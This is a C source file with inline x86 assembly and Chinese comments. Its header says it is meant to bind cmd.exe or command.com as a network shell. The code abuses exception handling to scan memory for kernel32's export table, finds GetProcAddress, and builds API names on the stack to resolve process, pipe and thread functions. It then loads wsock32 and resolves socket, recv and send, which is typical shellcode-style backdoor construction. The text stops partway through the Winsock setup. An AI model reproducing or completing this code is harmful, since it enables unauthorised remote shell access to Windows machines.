/*
利用异常结构处理搜索GetProcAddress入口地址
然后用这个函数加载其他api函数.实现线程一个返回另一个
绑定cmd.exe或command.com功能
*/
#include <stdio.h>
#include <windows.h>
main()
{
_asm
{
call ex
mov eax,0x77000000
mov [ebp-0ch],eax
mov eax,esp
sub eax,8
xchg fs:[0],eax
mov DWORD ptr[ebp-00h],eax
mov eax,fs:[4]
mov DWORD ptr[ebp-04h],eax
mov fs:[4h],ebp
add ecx,34h
push ecx
push eax
mov edx,0
mov byte ptr [edx],0
mov ebp,fs:[4]
mov dword ptr [ebp-8h],0
e104f:
cmp dword ptr [ebp-8h],0
jne exi
mov eax,[ebp-0ch]
add eax,10000h
mov [ebp-0ch],eax
cmp dword ptr [ebp-0ch],78000000h
jne is44
mov dword ptr [ebp-0ch],0BFF00000h
is44:
mov ecx,dword ptr [ebp-0ch]
xor edx,edx
mov dx,word ptr [ecx]
mov dword ptr [ebp-24h],ecx
cmp edx,5A4Dh//ZM
jne e11db
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+3Ch]
mov edx,dword ptr [ebp-0ch]
xor eax,eax
mov ax,word ptr [edx+ecx]
cmp eax,4550h
jne e11db
mov ecx,dword ptr [ebp-0ch]
mov edx,dword ptr [ecx+3Ch]
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+edx+78h]
add ecx,dword ptr [ebp-0ch]
mov dword ptr [ebp-10h],ecx
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+0Ch]
add eax,dword ptr [ebp-0ch]
mov dword ptr [ebp-14h],eax
mov ecx,dword ptr [ebp-14h]
cmp dword ptr [ecx],4E52454Bh
jne e11db
mov edx,dword ptr [ebp-14h]
cmp dword ptr [edx+4],32334C45h
jne e11db
mov eax,dword ptr [ebp-10h]
mov ecx,dword ptr [ebp-0ch]
add ecx,dword ptr [eax+20h]
mov dword ptr [ebp-14h],ecx
mov dword ptr [ebp-18h],0
jmp e1127
e1115:
mov edx,dword ptr [ebp-18h]
add edx,1
mov dword ptr [ebp-18h],edx
mov eax,dword ptr [ebp-14h]
add eax,4
mov dword ptr [ebp-14h],eax
e1127:
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ebp-18h]
cmp edx,dword ptr [ecx+18h]
jge e11db
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx],'PteG'
jne e11d6
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx+4],'Acor'
jne e11d6
mov eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+24h]
xor ecx,ecx
mov cx,word ptr [eax+edx]
mov dword ptr [ebp-14h],ecx
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+10h]
mov ecx,dword ptr [ebp-14h]
lea edx,dword ptr [ecx+eax-1]
mov dword ptr [ebp-14h],edx
mov eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+1Ch]
mov eax,dword ptr [eax+edx]
mov dword ptr [ebp-14h],eax
mov edx,dword ptr [ebp-14h]
add edx,dword ptr [ebp-0ch]
mov dword ptr [ebp-8h],edx
//恢复异常结构
mov eax,DWORD ptr[ebp-00h]
mov fs:[0],eax
mov eax,DWORD ptr[ebp-04h]
mov fs:[4],eax
jmp e11db
e11d6:
jmp e1115
e11db:
jmp e104f
}
//////////////////////////////////////////////////////////////
exi:
//取得各个需要函数的地址
//取得LoadLibraryA入口地址
_asm
{
call ex1
mov dword ptr [ecx-0C70h],ebp
mov dword ptr [ebp-124h],'daoL'
mov dword ptr [ebp-120h],'rbiL'
mov dword ptr [ebp-11Ch],'Ayra'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
push ebx
mov eax,dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
call eax
mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
//CreatePipe入口地址
mov dword ptr [ebp-124h],'aerC'
mov dword ptr [ebp-120h],'iPet'
mov dword ptr [ebp-11Ch],'ep'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4000h],eax//CreatePipe入口地址
cmp eax,0
jz exit1
//GetVersion入口地址
mov dword ptr [ebp-124h],'VteG'
mov dword ptr [ebp-120h],'isre'
mov dword ptr [ebp-11Ch],'no'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4004h],eax//GetVersion 入口地址
cmp eax,0
jz exit1
//CloseHandle入口地址
mov dword ptr [ebp-124h],'solC'
mov dword ptr [ebp-120h],'naHe'
mov dword ptr [ebp-11Ch],'eld'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4010h],eax//CloseHandle 入口地址
cmp eax,0
jz exit1
//ExitThread入口地址
mov dword ptr [ebp-124h],'tixE'
mov dword ptr [ebp-120h],'erhT'
mov dword ptr [ebp-11Ch],'da'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4014h],eax//ExitThread入口地址
cmp eax,0
jz exit1
//Sleep入口地址
mov dword ptr [ebp-124h],'eelS'
mov dword ptr [ebp-120h],'p'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4018h],eax//Sleep入口地址
cmp eax,0
jz exit1
//WriteFile入口地址
mov dword ptr [ebp-124h],'tirW'
mov dword ptr [ebp-120h],'liFe'
mov dword ptr [ebp-11Ch],'e'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-401Ch],eax//WriteFile入口地址
cmp eax,0
jz exit1
//PeekNamedPipe入口地址
mov dword ptr [ebp-124h],'keeP'
mov dword ptr [ebp-120h],'emaN'
mov dword ptr [ebp-11Ch],'piPd'
mov dword ptr [ebp-118h],'e'
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4020h],eax//PeekNamedPipe入口地址
cmp eax,0
jz exit1
//ReadFile入口地址
mov dword ptr [ebp-124h],'daeR'
mov dword ptr [ebp-120h],'eliF'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4024h],eax//ReadFile入口地址
cmp eax,0
jz exit1
//GetStartupInfoA入口地址
mov dword ptr [ebp-124h],'SteG'
mov dword ptr [ebp-120h],'trat'
mov dword ptr [ebp-11Ch],'nIpu'
mov dword ptr [ebp-118h],'Aof'
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4028h],eax//GetStartupInfoA入口地址
cmp eax,0
jz exit1
//CreateProcessA入口地址
mov dword ptr [ebp-124h],'aerC'
mov dword ptr [ebp-120h],'rPet'
mov dword ptr [ebp-11Ch],'seco'
mov dword ptr [ebp-118h],'As'
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-402Ch],eax//CreateProcessA入口地址
cmp eax,0
jz exit1
//CreateThread入口地址
mov dword ptr [ebp-124h],'aerC'
mov dword ptr [ebp-120h],'hTet'
mov dword ptr [ebp-11Ch],'daer'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax//CreateThread入口地址
cmp eax,0
jz exit1
}
//load wsock32.dll
_asm
{
mov dword ptr [ebp-124h],'cosw'
mov dword ptr [ebp-120h],'.23k'
mov dword ptr [ebp-11Ch],'lld'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
call dword ptr [ebp-400ch]
cmp eax,0
jz exit1
mov ebx,eax
//WSAStartup入口地址
mov dword ptr [ebp-124h],'SASW'
mov dword ptr [ebp-120h],'trat'
mov dword ptr [ebp-11Ch],'pu'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4030h],eax//WSAStartup入口地址
cmp eax,0
jz exit1
//__WSAFDIsSet入口地址
mov dword ptr [ebp-124h],'SW__'
mov dword ptr [ebp-120h],'IDFA'
mov dword ptr [ebp-11Ch],'teSs'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4034h],eax//__WSAFDIsSet入口地址
cmp eax,0
jz exit1
//socket入口地址
mov dword ptr [ebp-124h],'kcos'
mov dword ptr [ebp-120h],'te'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4038h],eax//socket入口地址
cmp eax,0
jz exit1
//closesocket入口地址
mov dword ptr [ebp-124h],'solc'
mov dword ptr [ebp-120h],'cose'
mov dword ptr [ebp-11Ch],'tek'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-403Ch],eax//closesocket入口地址
cmp eax,0
jz exit1
//select入口地址
mov dword ptr [ebp-124h],'eles'
mov dword ptr [ebp-120h],'tc'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4040h],eax//select入口地址
cmp eax,0
jz exit1
//recv入口地址
mov dword ptr [ebp-124h],'vcer'
mov dword ptr [ebp-120h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4044h],eax//recv入口地址
cmp eax,0
jz exit1
//send入口地址
mov dword ptr [ebp-124h],'dnes'
mov dword ptr [ebp-120h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4048h],eax//send入口地址
cmp eax,0
jz exit1
//htons入口地址
mov dword ptr [ebp-124h],'noth'
mov dword ptr [ebp-120h],'s'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]